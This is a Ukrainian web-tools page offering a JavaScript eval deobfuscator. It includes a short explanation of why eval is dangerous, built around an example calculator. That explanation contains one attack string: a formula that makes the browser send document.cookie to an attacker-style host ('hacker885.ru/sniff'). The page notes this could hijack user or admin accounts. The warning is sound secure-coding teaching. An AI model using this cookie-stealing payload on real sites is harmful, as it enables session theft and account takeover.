|| Онлайн калькулятори || Web-інструменти || Довідник || Кросворди
Дата і час Випадковий блок новин
Версія PHP: 7.4.15
Світова статистика online
Присутні в розділі: 3

JavaScript деобфуcкатор функції eval

Наявність функції eval в JS може таїти небезпеку. Приклад. Oтримуєте json-дані зі стороннього сайту, і парсите, не JSON.parse а eval. Власник стороннього сайту не піклується про безпеку і зловмисник цим користується з усіма наслідками, що випливають (для Вас).
Припустимо, ми написали калькулятор в якому можна зареєструватися і обмінюватися формулами (тобто серверна частина де зберігаються як мінімум облікові дані користувачів). Мета атакуючого - отримання доступу до облікового запису користувачів, або адміністратора даного ресурсу.
Сам калькулятор працює так: при натисканні якої-небудь цифрової або з символом математичної операцій клавіші, ми додаємо його до рядка expr, і у нас є:

expr = '4 + 5 * 7';
Коли ми натискаємо знак "=" - то виконується eval:
var result = eval(expr);
Взлом: Якщо зловмисник відправить формулу де крім математичного вмісту буде код на javascript, то той, кому це буде відправлено, разом з формулою запустить і шкідливий скрипт. Формула, отримана від зловмисника, може виглядати так:
expr = '(document.createElement("img")).src ="http://hacker885.ru/sniff?c=" + document.cookie, 4 + 5 * 7'; В результаті: зловмисник зможе: отримати куки, доступ до local/session storage, до вмісту сторінки, спробує закачати що-небудь (вірус наприклад).
Плюс: Якщо таким шляхом ми відправимо це повідомлення до адміністратора ресурсу, то завдяки отриманим нами правам, можливо зможемо дістатися до бекенда ресурсу.
Тому до скриптів, які містять функцію eval треба відноситись обережно

Розшифрувати


Ще не розкодовується? Натисніть кнопку Розшифрувати двічі !

Розміщено на UACMS

Знайшли помилку? Повідомте нас!
Оцініть наші старання:
Оцінoк немає
Ви користуєтесь броузером ||
WEB Tools - розділ сайту з інструментарієм для розробників: кодери та декодери, шифрувальники, редактори інформери, відладка, скрипт, код на javascript.
Сайт працює на UACMS
Сторінка онлайн інструментів для WEB
Несвіч-Городище2-Посада
ІНФОРМАЦІЙНО-ОСВІТНІЙ САЙТ
К-сть відвідувачів по країнах
Відвідувачі WEB-інструментів
» 1 - онлайн » 1 - сьогодні
» 21 - вчора » 22 - за тиждень
» 199 - в місяць » 872 - в рік
» 2536 - всього
» рекорд: 33 (01.03.2021)
Україна Google:31.12-19:15 || Yandex:14.01-19:47 || Bing:08.03-03:35 || Yahoo: || Msn: || Rambler:
Інформаційно-освітній сайт © 2013 - 2021